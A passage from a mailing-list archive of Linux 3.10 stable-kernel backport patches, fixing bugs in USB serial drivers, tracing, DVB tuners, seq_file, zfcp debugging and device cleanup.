Discussion:
[PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling
(too old to reply)
Willy Tarreau
2017-02-05 19:30:01 UTC
Permalink
From: Johan Hovold <***@kernel.org>

commit de24e0a108bc48062e1c7acaa97014bce32a919f upstream.

The current tiocmget implementation would fail to report errors up the
stack and instead leaked a few bits from the stack as a mask of
modem-status flags.

Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control")
Signed-off-by: Johan Hovold <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/serial/cp210x.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
index d1582d8..003f8dd 100644
--- a/drivers/usb/serial/cp210x.c
+++ b/drivers/usb/serial/cp210x.c
@@ -853,7 +853,9 @@ static int cp210x_tiocmget(struct tty_struct *tty)
unsigned int control;
int result;

- cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1);
+ result = cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1);
+ if (result)
+ return result;

result = ((control & CONTROL_DTR) ? TIOCM_DTR : 0)
|((control & CONTROL_RTS) ? TIOCM_RTS : 0)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Alexey Khoroshilov <***@ispras.ru>

commit 3b7c7e52efda0d4640060de747768360ba70a7c0 upstream.

There is an allocation with GFP_KERNEL flag in mos7840_write(),
while it may be called from interrupt context.

Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic
allocation in write path")

Found by Linux Driver Verification project (linuxtesting.org).

Signed-off-by: Alexey Khoroshilov <***@ispras.ru>
Signed-off-by: Johan Hovold <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/serial/mos7840.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c
index d060130..7df7df6 100644
--- a/drivers/usb/serial/mos7840.c
+++ b/drivers/usb/serial/mos7840.c
@@ -1438,8 +1438,8 @@ static int mos7840_write(struct tty_struct *tty, struct usb_serial_port *port,
}

if (urb->transfer_buffer == NULL) {
- urb->transfer_buffer =
- kmalloc(URB_TRANSFER_BUFFER_SIZE, GFP_KERNEL);
+ urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE,
+ GFP_ATOMIC);

if (urb->transfer_buffer == NULL) {
dev_err_console(port, "%s no more kernel memory...\n",
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Al Viro <***@zeniv.linux.org.uk>

commit 1ae2293dd6d2f5c823cf97e60b70d03631cd622f upstream.

Signed-off-by: Al Viro <***@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
kernel/trace/trace.c | 17 +++++++++--------
1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
index eff26a9..4ff36f7 100644
--- a/kernel/trace/trace.c
+++ b/kernel/trace/trace.c
@@ -5168,11 +5168,6 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
}
#endif

- if (splice_grow_spd(pipe, &spd)) {
- ret = -ENOMEM;
- goto out;
- }
-
if (*ppos & (PAGE_SIZE - 1)) {
ret = -EINVAL;
goto out;
@@ -5186,6 +5181,11 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
len &= PAGE_MASK;
}

+ if (splice_grow_spd(pipe, &spd)) {
+ ret = -ENOMEM;
+ goto out;
+ }
+
again:
trace_access_lock(iter->cpu_file);
entries = ring_buffer_entries_cpu(iter->trace_buffer->buffer, iter->cpu_file);
@@ -5241,21 +5241,22 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
if (!spd.nr_pages) {
if ((file->f_flags & O_NONBLOCK) || (flags & SPLICE_F_NONBLOCK)) {
ret = -EAGAIN;
- goto out;
+ goto out_shrink;
}
mutex_unlock(&trace_types_lock);
ret = iter->trace->wait_pipe(iter);
mutex_lock(&trace_types_lock);
if (ret)
- goto out;
+ goto out_shrink;
if (signal_pending(current)) {
ret = -EINTR;
- goto out;
+ goto out_shrink;
}
goto again;
}

ret = splice_to_pipe(pipe, &spd);
+out_shrink:
splice_shrink_spd(&spd);
out:
mutex_unlock(&trace_types_lock);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Mauro Carvalho Chehab <***@osg.samsung.com>

commit 505a0ea706fc1db4381baa6c6bd2e596e730a55e upstream.

With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
were still using experimental transmissions.

Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.

Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.

Signed-off-by: Mauro Carvalho Chehab <***@s-opensource.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/media/dvb-frontends/mb86a20s.c | 92 ++++++++++++++++------------------
1 file changed, 42 insertions(+), 50 deletions(-)

diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
index 3fbac5f..4a1346f 100644
--- a/drivers/media/dvb-frontends/mb86a20s.c
+++ b/drivers/media/dvb-frontends/mb86a20s.c
@@ -75,25 +75,27 @@ static struct regdata mb86a20s_init1[] = {
};

static struct regdata mb86a20s_init2[] = {
- { 0x28, 0x22 }, { 0x29, 0x00 }, { 0x2a, 0x1f }, { 0x2b, 0xf0 },
+ { 0x50, 0xd1 }, { 0x51, 0x22 },
+ { 0x39, 0x01 },
+ { 0x71, 0x00 },
{ 0x3b, 0x21 },
- { 0x3c, 0x38 },
+ { 0x3c, 0x3a },
{ 0x01, 0x0d },
- { 0x04, 0x08 }, { 0x05, 0x03 },
+ { 0x04, 0x08 }, { 0x05, 0x05 },
{ 0x04, 0x0e }, { 0x05, 0x00 },
- { 0x04, 0x0f }, { 0x05, 0x37 },
- { 0x04, 0x0b }, { 0x05, 0x78 },
+ { 0x04, 0x0f }, { 0x05, 0x14 },
+ { 0x04, 0x0b }, { 0x05, 0x8c },
{ 0x04, 0x00 }, { 0x05, 0x00 },
- { 0x04, 0x01 }, { 0x05, 0x1e },
- { 0x04, 0x02 }, { 0x05, 0x07 },
- { 0x04, 0x03 }, { 0x05, 0xd0 },
+ { 0x04, 0x01 }, { 0x05, 0x07 },
+ { 0x04, 0x02 }, { 0x05, 0x0f },
+ { 0x04, 0x03 }, { 0x05, 0xa0 },
{ 0x04, 0x09 }, { 0x05, 0x00 },
{ 0x04, 0x0a }, { 0x05, 0xff },
- { 0x04, 0x27 }, { 0x05, 0x00 },
+ { 0x04, 0x27 }, { 0x05, 0x64 },
{ 0x04, 0x28 }, { 0x05, 0x00 },
- { 0x04, 0x1e }, { 0x05, 0x00 },
- { 0x04, 0x29 }, { 0x05, 0x64 },
- { 0x04, 0x32 }, { 0x05, 0x02 },
+ { 0x04, 0x1e }, { 0x05, 0xff },
+ { 0x04, 0x29 }, { 0x05, 0x0a },
+ { 0x04, 0x32 }, { 0x05, 0x0a },
{ 0x04, 0x14 }, { 0x05, 0x02 },
{ 0x04, 0x04 }, { 0x05, 0x00 },
{ 0x04, 0x05 }, { 0x05, 0x22 },
@@ -101,8 +103,6 @@ static struct regdata mb86a20s_init2[] = {
{ 0x04, 0x07 }, { 0x05, 0xd8 },
{ 0x04, 0x12 }, { 0x05, 0x00 },
{ 0x04, 0x13 }, { 0x05, 0xff },
- { 0x04, 0x15 }, { 0x05, 0x4e },
- { 0x04, 0x16 }, { 0x05, 0x20 },

/*
* On this demod, when the bit count reaches the count below,
@@ -156,42 +156,36 @@ static struct regdata mb86a20s_init2[] = {
{ 0x50, 0x51 }, { 0x51, 0x04 }, /* MER symbol 4 */
{ 0x45, 0x04 }, /* CN symbol 4 */
{ 0x48, 0x04 }, /* CN manual mode */
-
+ { 0x50, 0xd5 }, { 0x51, 0x01 },
{ 0x50, 0xd6 }, { 0x51, 0x1f },
{ 0x50, 0xd2 }, { 0x51, 0x03 },
- { 0x50, 0xd7 }, { 0x51, 0xbf },
- { 0x28, 0x74 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xff },
- { 0x28, 0x46 }, { 0x29, 0x00 }, { 0x2a, 0x1a }, { 0x2b, 0x0c },
-
- { 0x04, 0x40 }, { 0x05, 0x00 },
- { 0x28, 0x00 }, { 0x2b, 0x08 },
- { 0x28, 0x05 }, { 0x2b, 0x00 },
+ { 0x50, 0xd7 }, { 0x51, 0x3f },
{ 0x1c, 0x01 },
- { 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x1f },
- { 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x18 },
- { 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x12 },
- { 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x30 },
- { 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x37 },
- { 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 },
- { 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x09 },
- { 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x06 },
- { 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7b },
- { 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x76 },
- { 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7d },
- { 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x08 },
- { 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0b },
- { 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 },
- { 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf2 },
- { 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf3 },
- { 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x05 },
- { 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 },
- { 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f },
- { 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xef },
- { 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xd8 },
- { 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xf1 },
- { 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x3d },
- { 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x94 },
- { 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xba },
+ { 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x03 },
+ { 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0d },
+ { 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 },
+ { 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x01 },
+ { 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x21 },
+ { 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x29 },
+ { 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 },
+ { 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x31 },
+ { 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0e },
+ { 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x4e },
+ { 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x46 },
+ { 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f },
+ { 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x56 },
+ { 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x35 },
+ { 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbe },
+ { 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0x84 },
+ { 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x03 }, { 0x2b, 0xee },
+ { 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x98 },
+ { 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x9f },
+ { 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xb2 },
+ { 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0xc2 },
+ { 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0x4a },
+ { 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbc },
+ { 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x04 }, { 0x2b, 0xba },
+ { 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0x14 },
{ 0x50, 0x1e }, { 0x51, 0x5d },
{ 0x50, 0x22 }, { 0x51, 0x00 },
{ 0x50, 0x23 }, { 0x51, 0xc8 },
@@ -200,9 +194,7 @@ static struct regdata mb86a20s_init2[] = {
{ 0x50, 0x26 }, { 0x51, 0x00 },
{ 0x50, 0x27 }, { 0x51, 0xc3 },
{ 0x50, 0x39 }, { 0x51, 0x02 },
- { 0xec, 0x0f },
- { 0xeb, 0x1f },
- { 0x28, 0x6a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 },
+ { 0x50, 0xd5 }, { 0x51, 0x01 },
{ 0xd0, 0x00 },
};
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Mauro Carvalho Chehab <***@osg.samsung.com>

commit 1871d718a9db649b70f0929d2778dc01bc49b286 upstream.

The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital to fail.

Signed-off-by: Mauro Carvalho Chehab <***@s-opensource.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/media/usb/cx231xx/cx231xx-avcore.c | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/media/usb/cx231xx/cx231xx-avcore.c b/drivers/media/usb/cx231xx/cx231xx-avcore.c
index 235ba65..79a24ef 100644
--- a/drivers/media/usb/cx231xx/cx231xx-avcore.c
+++ b/drivers/media/usb/cx231xx/cx231xx-avcore.c
@@ -1261,7 +1261,10 @@ int cx231xx_set_agc_analog_digital_mux_select(struct cx231xx *dev,
dev->board.agc_analog_digital_select_gpio,
analog_or_digital);

- return status;
+ if (status < 0)
+ return status;
+
+ return 0;
}

int cx231xx_enable_i2c_port_3(struct cx231xx *dev, bool is_port_3)
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Vegard Nossum <***@oracle.com>

commit 088bf2ff5d12e2e32ee52a4024fec26e582f44d3 upstream.

seq_read() is a nasty piece of work, not to mention buggy.

It has (I think) an old bug which allows unprivileged userspace to read
beyond the end of m->buf.

I was getting these:

BUG: KASAN: slab-out-of-bounds in seq_read+0xcd2/0x1480 at addr ffff880116889880
Read of size 2713 by task trinity-c2/1329
CPU: 2 PID: 1329 Comm: trinity-c2 Not tainted 4.8.0-rc1+ #96
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
Call Trace:
kasan_object_err+0x1c/0x80
kasan_report_error+0x2cb/0x7e0
kasan_report+0x4e/0x80
check_memory_region+0x13e/0x1a0
kasan_check_read+0x11/0x20
seq_read+0xcd2/0x1480
proc_reg_read+0x10b/0x260
do_loop_readv_writev.part.5+0x140/0x2c0
do_readv_writev+0x589/0x860
vfs_readv+0x7b/0xd0
do_readv+0xd8/0x2c0
SyS_readv+0xb/0x10
do_syscall_64+0x1b3/0x4b0
entry_SYSCALL64_slow_path+0x25/0x25
Object at ffff880116889100, in cache kmalloc-4096 size: 4096
Allocated:
PID = 1329
save_stack_trace+0x26/0x80
save_stack+0x46/0xd0
kasan_kmalloc+0xad/0xe0
__kmalloc+0x1aa/0x4a0
seq_buf_alloc+0x35/0x40
seq_read+0x7d8/0x1480
proc_reg_read+0x10b/0x260
do_loop_readv_writev.part.5+0x140/0x2c0
do_readv_writev+0x589/0x860
vfs_readv+0x7b/0xd0
do_readv+0xd8/0x2c0
SyS_readv+0xb/0x10
do_syscall_64+0x1b3/0x4b0
return_from_SYSCALL_64+0x0/0x6a
Freed:
PID = 0
(stack is not available)
Memory state around the buggy address:
ffff88011688a000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ffff88011688a080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ffff88011688a100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
^
ffff88011688a180: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff88011688a200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
Disabling lock debugging due to kernel taint

This seems to be the same thing that Dave Jones was seeing here:

https://lkml.org/lkml/2016/8/12/334

There are multiple issues here:

1) If we enter the function with a non-empty buffer, there is an attempt
to flush it. But it was not clearing m->from after doing so, which
means that if we try to do this flush twice in a row without any call
to traverse() in between, we are going to be reading from the wrong
place -- the splat above, fixed by this patch.

2) If there's a short write to userspace because of page faults, the
buffer may already contain multiple lines (i.e. pos has advanced by
more than 1), but we don't save the progress that was made so the
next call will output what we've already returned previously. Since
that is a much less serious issue (and I have a headache after
staring at seq_read() for the past 8 hours), I'll leave that for now.

Link: http://lkml.kernel.org/r/1471447270-32093-1-git-send-email-***@oracle.com
Signed-off-by: Vegard Nossum <***@oracle.com>
Reported-by: Dave Jones <***@codemonkey.org.uk>
Cc: Al Viro <***@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <***@linux-foundation.org>
Signed-off-by: Linus Torvalds <***@linux-foundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/seq_file.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/fs/seq_file.c b/fs/seq_file.c
index 3dd44db..c009e60 100644
--- a/fs/seq_file.c
+++ b/fs/seq_file.c
@@ -206,8 +206,10 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
size -= n;
buf += n;
copied += n;
- if (!m->count)
+ if (!m->count) {
+ m->from = 0;
m->index++;
+ }
if (!size)
goto Done;
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Steffen Maier <***@linux.vnet.ibm.com>

commit 35f040df97fa0e94c7851c054ec71533c88b4b81 upstream.

While retaining the actual filtering according to trace level,
the following commits started to write such filtered records
with a hardcoded record level of 1 instead of the actual record level:
commit 250a1352b95e1db3216e5c5d4f4365bea5122f4a
("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")

Now we can distinguish written records again for offline level filtering.

Signed-off-by: Steffen Maier <***@linux.vnet.ibm.com>
Fixes: 250a1352b95e ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <***@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <***@suse.com>
Signed-off-by: Martin K. Petersen <***@oracle.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/s390/scsi/zfcp_dbf.c | 11 ++++++-----
drivers/s390/scsi/zfcp_dbf.h | 4 ++--
drivers/s390/scsi/zfcp_ext.h | 7 ++++---
3 files changed, 12 insertions(+), 10 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index e1a8cc2..8f668c6 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -3,7 +3,7 @@
*
* Debug traces for zfcp.
*
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
*/

#define KMSG_COMPONENT "zfcp"
@@ -58,7 +58,7 @@ void zfcp_dbf_pl_write(struct zfcp_dbf *dbf, void *data, u16 length, char *area,
* @tag: tag indicating which kind of unsolicited status has been received
* @req: request for which a response was received
*/
-void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req)
+void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req)
{
struct zfcp_dbf *dbf = req->adapter->dbf;
struct fsf_qtcb_prefix *q_pref = &req->qtcb->prefix;
@@ -90,7 +90,7 @@ void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req)
rec->pl_len, "fsf_res", req->req_id);
}

- debug_event(dbf->hba, 1, rec, sizeof(*rec));
+ debug_event(dbf->hba, level, rec, sizeof(*rec));
spin_unlock_irqrestore(&dbf->hba_lock, flags);
}

@@ -392,7 +392,8 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf)
* @sc: pointer to struct scsi_cmnd
* @fsf: pointer to struct zfcp_fsf_req
*/
-void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf)
+void zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *sc,
+ struct zfcp_fsf_req *fsf)
{
struct zfcp_adapter *adapter =
(struct zfcp_adapter *) sc->device->host->hostdata[0];
@@ -434,7 +435,7 @@ void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf)
}
}

- debug_event(dbf->scsi, 1, rec, sizeof(*rec));
+ debug_event(dbf->scsi, level, rec, sizeof(*rec));
spin_unlock_irqrestore(&dbf->scsi_lock, flags);
}

diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index b5afa3d..97f46e6 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -284,7 +284,7 @@ static inline
void zfcp_dbf_hba_fsf_resp(char *tag, int level, struct zfcp_fsf_req *req)
{
if (level <= req->adapter->dbf->hba->level)
- zfcp_dbf_hba_fsf_res(tag, req);
+ zfcp_dbf_hba_fsf_res(tag, level, req);
}

/**
@@ -323,7 +323,7 @@ void _zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *scmd,
scmd->device->host->hostdata[0];

if (level <= adapter->dbf->scsi->level)
- zfcp_dbf_scsi(tag, scmd, req);
+ zfcp_dbf_scsi(tag, level, scmd, req);
}

/**
diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h
index 1d3dd3f..1282165 100644
--- a/drivers/s390/scsi/zfcp_ext.h
+++ b/drivers/s390/scsi/zfcp_ext.h
@@ -3,7 +3,7 @@
*
* External function declarations.
*
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
*/

#ifndef ZFCP_EXT_H
@@ -50,7 +50,7 @@ extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *,
struct zfcp_port *, struct scsi_device *, u8, u8);
extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *);
extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *);
-extern void zfcp_dbf_hba_fsf_res(char *, struct zfcp_fsf_req *);
+extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *);
extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *);
extern void zfcp_dbf_hba_berr(struct zfcp_dbf *, struct zfcp_fsf_req *);
extern void zfcp_dbf_hba_def_err(struct zfcp_adapter *, u64, u16, void **);
@@ -58,7 +58,8 @@ extern void zfcp_dbf_hba_basic(char *, struct zfcp_adapter *);
extern void zfcp_dbf_san_req(char *, struct zfcp_fsf_req *, u32);
extern void zfcp_dbf_san_res(char *, struct zfcp_fsf_req *);
extern void zfcp_dbf_san_in_els(char *, struct zfcp_fsf_req *);
-extern void zfcp_dbf_scsi(char *, struct scsi_cmnd *, struct zfcp_fsf_req *);
+extern void zfcp_dbf_scsi(char *, int, struct scsi_cmnd *,
+ struct zfcp_fsf_req *);

/* zfcp_erp.c */
extern void zfcp_erp_set_adapter_status(struct zfcp_adapter *, u32);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Ming Lei <***@canonical.com>

commit cebf8fd16900fdfd58c0028617944f808f97fe50 upstream.

The global mutex of 'gdp_mutex' is used to serialize creating/querying
glue dir and its cleanup. Turns out it isn't a perfect way because
part(kobj_kset_leave()) of the actual cleanup action() is done inside
the release handler of the glue dir kobject. That means gdp_mutex has
to be held before releasing the last reference count of the glue dir
kobject.

This patch moves glue dir's cleanup after kobject_del() in device_del()
for avoiding the race.

Cc: Yijing Wang <***@huawei.com>
Reported-by: Chandra Sekhar Lingutla <***@codeaurora.org>
Signed-off-by: Ming Lei <***@canonical.com>
Signed-off-by: Greg Kroah-Hartman <***@linuxfoundation.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/base/core.c | 39 +++++++++++++++++++++++++++++----------
1 file changed, 29 insertions(+), 10 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index d92ecf3..986fc4e 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -827,11 +827,29 @@ static struct kobject *get_device_parent(struct device *dev,
return NULL;
}

+static inline bool live_in_glue_dir(struct kobject *kobj,
+ struct device *dev)
+{
+ if (!kobj || !dev->class ||
+ kobj->kset != &dev->class->p->glue_dirs)
+ return false;
+ return true;
+}
+
+static inline struct kobject *get_glue_dir(struct device *dev)
+{
+ return dev->kobj.parent;
+}
+
+/*
+ * make sure cleaning up dir as the last step, we need to make
+ * sure .release handler of kobject is run with holding the
+ * global lock
+ */
static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir)
{
/* see if we live in a "glue" directory */
- if (!glue_dir || !dev->class ||
- glue_dir->kset != &dev->class->p->glue_dirs)
+ if (!live_in_glue_dir(glue_dir, dev))
return;

mutex_lock(&gdp_mutex);
@@ -839,11 +857,6 @@ static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir)
mutex_unlock(&gdp_mutex);
}

-static void cleanup_device_parent(struct device *dev)
-{
- cleanup_glue_dir(dev, dev->kobj.parent);
-}
-
static int device_add_class_symlinks(struct device *dev)
{
int error;
@@ -1007,6 +1020,7 @@ int device_add(struct device *dev)
struct kobject *kobj;
struct class_interface *class_intf;
int error = -EINVAL;
+ struct kobject *glue_dir = NULL;

dev = get_device(dev);
if (!dev)
@@ -1051,8 +1065,10 @@ int device_add(struct device *dev)
/* first, register with generic layer. */
/* we require the name to be set before, and pass NULL */
error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
- if (error)
+ if (error) {
+ glue_dir = get_glue_dir(dev);
goto Error;
+ }

/* notify platform of device entry */
if (platform_notify)
@@ -1135,9 +1151,10 @@ done:
device_remove_file(dev, &uevent_attr);
attrError:
kobject_uevent(&dev->kobj, KOBJ_REMOVE);
+ glue_dir = get_glue_dir(dev);
kobject_del(&dev->kobj);
Error:
- cleanup_device_parent(dev);
+ cleanup_glue_dir(dev, glue_dir);
put_device(parent);
name_error:
kfree(dev->p);
@@ -1209,6 +1226,7 @@ void put_device(struct device *dev)
void device_del(struct device *dev)
{
struct device *parent = dev->parent;
+ struct kobject *glue_dir = NULL;
struct class_interface *class_intf;

/* Notify clients of device removal. This call must come
@@ -1250,8 +1268,9 @@ void device_del(struct device *dev)
if (platform_notify_remove)
platform_notify_remove(dev);
kobject_uevent(&dev->kobj, KOBJ_REMOVE);
- cleanup_device_parent(dev);
+ glue_dir = get_glue_dir(dev);
kobject_del(&dev->kobj);
+ cleanup_glue_dir(dev, glue_dir);
put_device(parent);
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:02 UTC
Permalink
From: Dan Carpenter <***@oracle.com>

commit e44c153b30c9a0580fc2b5a93f3c6d593def2278 upstream.

The code is checking for negative returns but it should be checking for
zero.

Fixes: aab3125c43d8 ('[media] em28xx: add support for registering multiple i2c buses')

